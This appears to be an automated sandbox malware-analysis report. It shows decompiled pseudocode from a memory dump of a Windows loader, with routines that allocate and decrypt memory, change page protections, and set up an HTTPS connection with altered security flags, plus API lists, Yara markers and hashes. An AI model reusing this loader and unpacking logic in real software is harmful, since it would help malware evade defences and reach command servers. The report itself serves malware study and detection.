                                                                                                                                                                                                                                						_t32 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                						_t11 = _t32 + 0xa9edbc; // 0x4fd9364
                                                                                                                                                                                                                                						_t48 = _t11;
                                                                                                                                                                                                                                						_t12 = _t32 + 0xa9ed70; // 0x4f0053
                                                                                                                                                                                                                                						_t52 = E00A91FCE(_t11, _t12, _t11);
                                                                                                                                                                                                                                						_t59 = _t52;
                                                                                                                                                                                                                                						if(_t52 != 0) {
                                                                                                                                                                                                                                							_t35 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                							_t13 = _t35 + 0xa9ee06; // 0x30314549
                                                                                                                                                                                                                                							_t37 = E00A92AE3(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                                                                                                                                                                                                							if(_t37 == 0) {
                                                                                                                                                                                                                                								_t61 =  *0xa9d294 - 6;
                                                                                                                                                                                                                                								if( *0xa9d294 <= 6) {
                                                                                                                                                                                                                                									_t42 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                									_t15 = _t42 + 0xa9ec12; // 0x52384549
                                                                                                                                                                                                                                									E00A92AE3(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t38 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                							_t17 = _t38 + 0xa9ee00; // 0x4fd93a8
                                                                                                                                                                                                                                							_t18 = _t38 + 0xa9edd8; // 0x680043
                                                                                                                                                                                                                                							_t45 = E00A99BED(_v8, 0x80000001, _t52, _t18, _t17);
                                                                                                                                                                                                                                							HeapFree( *0xa9d270, 0, _t52);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _v16);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t54 = _v8;
                                                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                                                					E00A9704F(_t54);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t45;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04FD9370,00000000,?,747DF710,00000000,747DF730), ref: 00A92981
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04FD93A8,?,00000000,30314549,00000014,004F0053,04FD9364), ref: 00A92A1E
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A9A080), ref: 00A92A30
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: 74e4ae681c3ae6fe95900d2667307f39d0422f9c7e7671d6bbbd56833b649adf
                                                                                                                                                                                                                                • Instruction ID: 217d1a94232e183a1cd730c7350cffa3e94420ca369e7277171ffd0340625e97
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74e4ae681c3ae6fe95900d2667307f39d0422f9c7e7671d6bbbd56833b649adf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF316F72B00118BFEF21DBD4DE85EEA7BFCEB44740F1400AAB50097061DA70AE4A9B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E00A61B7F(void* __eax, void* _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                				int _t43;
                                                                                                                                                                                                                                				long _t54;
                                                                                                                                                                                                                                				signed int _t57;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				signed int _t60;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                				_t57 =  *0xa641c0;
                                                                                                                                                                                                                                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                                				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				if(_v16 <= 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					L1:
                                                                                                                                                                                                                                					_t60 = _v12;
                                                                                                                                                                                                                                					if(_t60 != 0) {
                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                					if(_t60 >= 0) {
                                                                                                                                                                                                                                						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                						if(__eflags >= 0) {
                                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                                							_t54 = _t57 - 0x69b25f40;
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                                                                                                                							if(_t43 == 0) {
                                                                                                                                                                                                                                								_v12 = GetLastError();
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_v8 = _v8 + 1;
                                                                                                                                                                                                                                							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                                                                                                                                                                                                                							if(_v8 < _v16) {
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                						_t54 = _t57 - 0x69b25f42;
                                                                                                                                                                                                                                						if(__eflags >= 0) {
                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                					if(_t60 >= 0) {
                                                                                                                                                                                                                                						_t54 = _t57 - 0x69b25f24;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t54 = _t57 - 0x69b25f04;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00A61BB8
                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00A61C2D
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A61C33
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1469625949-1084903527
                                                                                                                                                                                                                                • Opcode ID: 7ddb87e2d2b5dc2fa3465860aaae2bf69fa3010cab9a7f8bc019a8c7ced00492
                                                                                                                                                                                                                                • Instruction ID: 47cb944846775e6e98224d85456c33ef46aee05a5f46e1f8b741fdcf687a69f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ddb87e2d2b5dc2fa3465860aaae2bf69fa3010cab9a7f8bc019a8c7ced00492
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8216B7190020AEFCB14CF95C881ABEFBF4FF08345F454459D202D7018E7B4AAA9CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			E00A617CE(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				unsigned int _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				signed int _v52;
                                                                                                                                                                                                                                				signed int _v56;
                                                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                				intOrPtr _t72;
                                                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                                                				intOrPtr _t84;
                                                                                                                                                                                                                                				intOrPtr* _t86;
                                                                                                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                                                				intOrPtr _t94;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t91 =  *0xa641b0;
                                                                                                                                                                                                                                				_t52 = E00A61917(_t91,  &_v32,  &_v24);
                                                                                                                                                                                                                                				_v28 = _t52;
                                                                                                                                                                                                                                				if(_t52 == 0) {
                                                                                                                                                                                                                                					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                					_t69 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
                                                                                                                                                                                                                                					_t92 = _t91 + _v32;
                                                                                                                                                                                                                                					_v44 = _t92;
                                                                                                                                                                                                                                					_t59 = VirtualAlloc(0, _t69 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                					_t71 = _t59;
                                                                                                                                                                                                                                					_v36 = _t71;
                                                                                                                                                                                                                                					if(_t71 == 0) {
                                                                                                                                                                                                                                						_v28 = 8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                						if(_t69 <= 0) {
                                                                                                                                                                                                                                							_t72 =  *0xa641c0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t84 = _a4;
                                                                                                                                                                                                                                							_v12 = _t92;
                                                                                                                                                                                                                                							_v12 = _v12 - _t71;
                                                                                                                                                                                                                                							_t16 = _t84 + 0xa651a7; // 0x3220a9c2
                                                                                                                                                                                                                                							_t63 = _t59 - _t92 + _t16;
                                                                                                                                                                                                                                							_v20 = _t71;
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                								_v16 = 0x400;
                                                                                                                                                                                                                                								_t94 = 0;
                                                                                                                                                                                                                                								_t86 = _v20;
                                                                                                                                                                                                                                								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                									_t79 =  *((intOrPtr*)(_v12 + _t86));
                                                                                                                                                                                                                                									_t89 = _t79;
                                                                                                                                                                                                                                									if(_t79 == 0) {
                                                                                                                                                                                                                                										_v16 = 1;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										 *_t86 = _t79 + _t94 - _v40;
                                                                                                                                                                                                                                										_t94 = _t89;
                                                                                                                                                                                                                                										_t86 = _t86 + 4;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t33 =  &_v16;
                                                                                                                                                                                                                                									 *_t33 = _v16 - 1;
                                                                                                                                                                                                                                								} while ( *_t33 != 0);
                                                                                                                                                                                                                                								_v20 = _v20 + 0x1000;
                                                                                                                                                                                                                                								_t72 =  *((intOrPtr*)(_t63 + 0xc)) -  *((intOrPtr*)(_t63 + 8)) +  *((intOrPtr*)(_t63 + 4));
                                                                                                                                                                                                                                								_v8 = _v8 + 1;
                                                                                                                                                                                                                                								 *0xa641c0 = _t72;
                                                                                                                                                                                                                                							} while (_v8 < _t69);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t72 != 0x69b25f44) {
                                                                                                                                                                                                                                							_v28 = 9;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							memcpy(_v44, _v36, _v24);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						VirtualFree(_v36, 0, 0x8000); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v28;
                                                                                                                                                                                                                                			}




























                                                                                                                                                                                                                                0x00a61855
                                                                                                                                                                                                                                0x00a61859
                                                                                                                                                                                                                                0x00a61864
                                                                                                                                                                                                                                0x00a61865
                                                                                                                                                                                                                                0x00a61866
                                                                                                                                                                                                                                0x00a6186d
                                                                                                                                                                                                                                0x00a6187a
                                                                                                                                                                                                                                0x00a61880
                                                                                                                                                                                                                                0x00a61883
                                                                                                                                                                                                                                0x00a61886
                                                                                                                                                                                                                                0x00a61889
                                                                                                                                                                                                                                0x00a6188c
                                                                                                                                                                                                                                0x00a61890
                                                                                                                                                                                                                                0x00a618a0
                                                                                                                                                                                                                                0x00a61892
                                                                                                                                                                                                                                0x00a61897
                                                                                                                                                                                                                                0x00a61899
                                                                                                                                                                                                                                0x00a6189b
                                                                                                                                                                                                                                0x00a6189b
                                                                                                                                                                                                                                0x00a618a7
                                                                                                                                                                                                                                0x00a618a7
                                                                                                                                                                                                                                0x00a618a7
                                                                                                                                                                                                                                0x00a618b2
                                                                                                                                                                                                                                0x00a618b9
                                                                                                                                                                                                                                0x00a618bc
                                                                                                                                                                                                                                0x00a618bf
                                                                                                                                                                                                                                0x00a618c5
                                                                                                                                                                                                                                0x00a618ca
                                                                                                                                                                                                                                0x00a618d9
                                                                                                                                                                                                                                0x00a618ee
                                                                                                                                                                                                                                0x00a618db
                                                                                                                                                                                                                                0x00a618e4
                                                                                                                                                                                                                                0x00a618e9
                                                                                                                                                                                                                                0x00a618ff
                                                                                                                                                                                                                                0x00a618ff
                                                                                                                                                                                                                                0x00a6190e
                                                                                                                                                                                                                                0x00a61914

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,00A615E1), ref: 00A61824
                                                                                                                                                                                                                                • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,?,00A615E1,00000000,00000030,747863F0,00000000), ref: 00A618E4
                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A618FF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                • String ID: Oct 27 2021
                                                                                                                                                                                                                                • API String ID: 4010158826-1702575778
                                                                                                                                                                                                                                • Opcode ID: 30d950d3bc96d7c561c4590dc4d048734b91767bb6ea1dd95001bf636ea9910e
                                                                                                                                                                                                                                • Instruction ID: cfb28bbf46c212578aaa9405aa31408a440583ababaf5ced7bf0ae846576b19e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30d950d3bc96d7c561c4590dc4d048734b91767bb6ea1dd95001bf636ea9910e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9415C72E00219DFDF04CF94D990BAEBBB5FF09314F154169E911B7240D7B1AA45CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(80000002), ref: 00A94AC7
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00A948F5), ref: 00A94B0B
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A94B1F
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A94B2D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 293c574e1e2bd769a9345d15e4c8170fff58887fe5e47a02be7df2fd91228a74
                                                                                                                                                                                                                                • Instruction ID: 0b40ccfdffaa1e25e5f1006c1704311b78af65e33d14310d62de88059ae989a8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 293c574e1e2bd769a9345d15e4c8170fff58887fe5e47a02be7df2fd91228a74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB310B76A00209EFCB05DFD8D884DAE7BB9FF18340B20842EE5059B251DB70DA86CB65
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E00A61EB4(void* __ecx, char _a4) {
                                                                                                                                                                                                                                				long _t3;
                                                                                                                                                                                                                                				int _t4;
                                                                                                                                                                                                                                				int _t9;
                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                                                                                                					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t4 = E00A6156C(_a4); // executed
                                                                                                                                                                                                                                				_t9 = _t4;
                                                                                                                                                                                                                                				if(_t9 == 0) {
                                                                                                                                                                                                                                					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                				return _t9;
                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00A61EB7
                                                                                                                                                                                                                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00A61EC2
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 00A61ED5
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 00A61EE8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452675757-0
                                                                                                                                                                                                                                • Opcode ID: 85beb2d264fa86198f7ae37c80d830f655340271cec1558f250063a8513bd111
                                                                                                                                                                                                                                • Instruction ID: 52d6ceba904669adbd752bdff4162bb8de5b9fb6da3cf1e4e462d1b6093d95d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85beb2d264fa86198f7ae37c80d830f655340271cec1558f250063a8513bd111
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE092323062112BAA11AB695C84D7BBA7CEF923317060335FA21922E0CB91CD0789A5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 23%
                                                                                                                                                                                                                                			E00A97648(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				unsigned int _t37;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				intOrPtr* _t66;
                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t66 = __esi;
                                                                                                                                                                                                                                				_t63 = E00A93037(_t34, _a4);
                                                                                                                                                                                                                                				if(_t63 == 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					_t36 = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t37 = GetVersion();
                                                                                                                                                                                                                                					_t69 = _t37 - 6;
                                                                                                                                                                                                                                					if(_t69 > 0) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						_a4 = 4;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t69 != 0) {
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							_a4 = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t37 = _t37 >> 8;
                                                                                                                                                                                                                                							if(_t37 > 2) {
                                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__imp__(_t63, _a4, 0, 0, 0); // executed
                                                                                                                                                                                                                                					 *(_t66 + 0x10) = _t37;
                                                                                                                                                                                                                                					_t38 = E00A953BB(_t63);
                                                                                                                                                                                                                                					if( *(_t66 + 0x10) == 0) {
                                                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t39 = E00A93037(_t38,  *_t66);
                                                                                                                                                                                                                                						_v8 = _t39;
                                                                                                                                                                                                                                						if(_t39 == 0) {
                                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t65 = __imp__; // 0x7021f5a0
                                                                                                                                                                                                                                							if(_a8 == 0) {
                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                                                                                                                                                                                                                                								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                                                                                                                                                                                                                                								_t40 = E00A953BB(_v8);
                                                                                                                                                                                                                                								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_a4 = 0x800100;
                                                                                                                                                                                                                                									_t56 = E00A93037(_t40,  *((intOrPtr*)(_t66 + 4)));
                                                                                                                                                                                                                                									if(_t56 == 0) {
                                                                                                                                                                                                                                										goto L18;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t42 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                										_t19 = _t42 + 0xa9e758; // 0x450047
                                                                                                                                                                                                                                										_t43 = _t19;
                                                                                                                                                                                                                                										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                                                                                                                                                                                                                                										E00A953BB(_t56);
                                                                                                                                                                                                                                										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                                                                                                                										if(_t45 == 0) {
                                                                                                                                                                                                                                											goto L18;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t57 = 4;
                                                                                                                                                                                                                                											_v12 = _t57;
                                                                                                                                                                                                                                											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                                                                                                                                                                                                                                											if(_t45 != 0) {
                                                                                                                                                                                                                                												_a4 = _a4 | 0x00000100;
                                                                                                                                                                                                                                												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											_push(_t57);
                                                                                                                                                                                                                                											_push( &_a8);
                                                                                                                                                                                                                                											_push(6);
                                                                                                                                                                                                                                											_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                                                                                                                											if( *_t65() == 0) {
                                                                                                                                                                                                                                												goto L18;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												_push(_t57);
                                                                                                                                                                                                                                												_push( &_a8);
                                                                                                                                                                                                                                												_push(5);
                                                                                                                                                                                                                                												_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                                                                                                                												if( *_t65() == 0) {
                                                                                                                                                                                                                                													goto L18;
                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                													_t36 = 0;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                                                                                                                                                                                                                                								if(_t39 == 0) {
                                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L10;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t36;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: lstrlen.KERNEL32(?,00000000,04FD9BB8,00000000,00A96F37,04FD9D96,?,?,?,?,?,69B25F44,00000005,00A9D00C), ref: 00A9303E
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: mbstowcs.NTDLL ref: 00A93067
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: memset.NTDLL ref: 00A93079
                                                                                                                                                                                                                                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A92E91,00000000,00000000,04FD9618,?,?,00A921A4,?,04FD9618,0000EA60), ref: 00A97663
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A92E91,00000000,00000000,04FD9618,?,?,00A921A4,?,04FD9618,0000EA60), ref: 00A9778E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
